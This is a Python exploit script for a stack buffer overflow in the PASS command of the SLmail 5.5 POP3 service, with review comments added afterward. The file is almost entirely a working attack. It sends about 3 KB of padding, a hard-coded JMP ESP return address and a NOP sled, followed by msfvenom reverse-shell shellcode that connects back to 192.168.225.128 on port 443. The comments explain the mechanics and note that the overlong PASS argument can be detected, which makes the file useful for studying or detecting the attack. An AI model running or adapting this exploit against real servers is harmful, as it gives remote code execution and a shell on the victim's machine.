SLmail5.5POP3-'PASS'BufferOverflow.py
#!/usr/bin/env python
"""SLmail 5.5 POP3 'PASS' stack buffer overflow proof of concept.

Connects to a POP3 service, discards the banner, sends a fixed USER line,
then sends a PASS argument of roughly 3 KB built as
``junk + eip + nop + shellcode + nop`` (see ``exploit`` below).  ``eip`` is
a hard-coded return address into SHELL32.dll (0x7CB32D69 per the inline
comment), so the payload is tied to the one DLL build that address was
taken from.  The script has no argument validation, no socket timeout and
no error handling; its only output is an unconditional success message.

Usage: python exploit.py [target] [port]

NOTE(review): all string literals are unprefixed.  Under Python 2 (the
shebang's ``python``) they are byte strings; under Python 3 they are text
and ``socket.send()`` raises TypeError before anything is sent.
"""
import socket,sys
#How To Use: python exploit.py [target] [port] or ./exploit.py [target] [port]
# 2606 bytes of 'A' (0x41): padding up to the point where the following four
# bytes land on the saved return address (per the variable name). The 2606
# offset is a hard-coded constant, not derived by this script.
junk = '\x41' * 2606
# Four bytes, little-endian 0x7CB32D69 (69 2D B3 7C); the original comment
# identifies it as a JMP ESP in SHELL32.dll. A fixed address like this is
# build-specific: a different SHELL32.dll build, or ASLR, relocates it.
eip = '\x69\x2D\xB3\x7C' #JMP ESP SHELL32.dll 7CB32D69
# 26-byte NOP sled placed directly after the return address, ahead of the shellcode.
nop = '\x90' * 26
#Shellcode: "msfvenom -p windows/shell_reverse_tcp LHOST=192.168.225.128 LPORT=443 -b '\x0a\x0d\x00' -f c"
# 351 bytes as listed. The callback address/port (LHOST/LPORT above) were
# baked in when the payload was generated, so there is no runtime option for
# them. ``-b`` excluded LF, CR and NUL, the bytes a line-based POP3 parser
# would treat as terminators.
shellcode = ("\xd9\xcb\xbb\x44\x18\xdd\x0f\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x31\x5a\x17\x83\xea\xfc\x03\x1e\x0b\x3f\xfa\x62\xc3\x3d"
"\x05\x9a\x14\x22\x8f\x7f\x25\x62\xeb\xf4\x16\x52\x7f\x58\x9b"
"\x19\x2d\x48\x28\x6f\xfa\x7f\x99\xda\xdc\x4e\x1a\x76\x1c\xd1"
"\x98\x85\x71\x31\xa0\x45\x84\x30\xe5\xb8\x65\x60\xbe\xb7\xd8"
"\x94\xcb\x82\xe0\x1f\x87\x03\x61\xfc\x50\x25\x40\x53\xea\x7c"
"\x42\x52\x3f\xf5\xcb\x4c\x5c\x30\x85\xe7\x96\xce\x14\x21\xe7"
"\x2f\xba\x0c\xc7\xdd\xc2\x49\xe0\x3d\xb1\xa3\x12\xc3\xc2\x70"
"\x68\x1f\x46\x62\xca\xd4\xf0\x4e\xea\x39\x66\x05\xe0\xf6\xec"
"\x41\xe5\x09\x20\xfa\x11\x81\xc7\x2c\x90\xd1\xe3\xe8\xf8\x82"
"\x8a\xa9\xa4\x65\xb2\xa9\x06\xd9\x16\xa2\xab\x0e\x2b\xe9\xa3"
"\xe3\x06\x11\x34\x6c\x10\x62\x06\x33\x8a\xec\x2a\xbc\x14\xeb"
"\x4d\x97\xe1\x63\xb0\x18\x12\xaa\x77\x4c\x42\xc4\x5e\xed\x09"
"\x14\x5e\x38\x9d\x44\xf0\x93\x5e\x34\xb0\x43\x37\x5e\x3f\xbb"
"\x27\x61\x95\xd4\xc2\x98\x7e\x1b\xba\x43\xfe\xf3\xb9\x83\xfe"
"\xb8\x37\x65\x6a\xaf\x11\x3e\x03\x56\x38\xb4\xb2\x97\x96\xb1"
"\xf5\x1c\x15\x46\xbb\xd4\x50\x54\x2c\x15\x2f\x06\xfb\x2a\x85"
"\x2e\x67\xb8\x42\xae\xee\xa1\xdc\xf9\xa7\x14\x15\x6f\x5a\x0e"
"\x8f\x8d\xa7\xd6\xe8\x15\x7c\x2b\xf6\x94\xf1\x17\xdc\x86\xcf"
"\x98\x58\xf2\x9f\xce\x36\xac\x59\xb9\xf8\x06\x30\x16\x53\xce"
"\xc5\x54\x64\x88\xc9\xb0\x12\x74\x7b\x6d\x63\x8b\xb4\xf9\x63"
"\xf4\xa8\x99\x8c\x2f\x69\xa9\xc6\x6d\xd8\x22\x8f\xe4\x58\x2f"
"\x30\xd3\x9f\x56\xb3\xd1\x5f\xad\xab\x90\x5a\xe9\x6b\x49\x17"
"\x62\x1e\x6d\x84\x83\x0b")
# Final PASS argument: 2606 + 4 + 26 + 351 + 26 = 3013 bytes. RFC 1939 allows
# a POP3 argument of at most 40 characters, so the length alone is the
# detectable signal: a server that enforces that bound, or a proxy/IDS rule
# on PASS argument length, stops this whole class of input.
exploit = junk + eip + nop + shellcode + nop
# Plain TCP client socket. No timeout is set, so each recv() below blocks
# indefinitely if the service never answers.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# argv[1]/argv[2] are used without validation: a missing argument raises
# IndexError and a non-numeric port raises ValueError.
s.connect((sys.argv[1],int(sys.argv[2])))
# Read and discard the server greeting (return value unused).
s.recv(1024)
# Fixed USER line; the reply is read and discarded, so the username is never checked here.
s.send('USER Hacker'+'\r\n')
s.recv(1024)
# The oversized PASS line is the trigger; CRLF terminates it as one command.
s.send('PASS ' + exploit + '\r\n')
# Closed only on the happy path: there is no try/finally, so a failed
# connect() or send() leaves the socket to be released at interpreter exit.
s.close()
# Printed unconditionally: this only means the bytes were sent, not that
# anything happened on the target.
print("\nExploit Completed :)\n")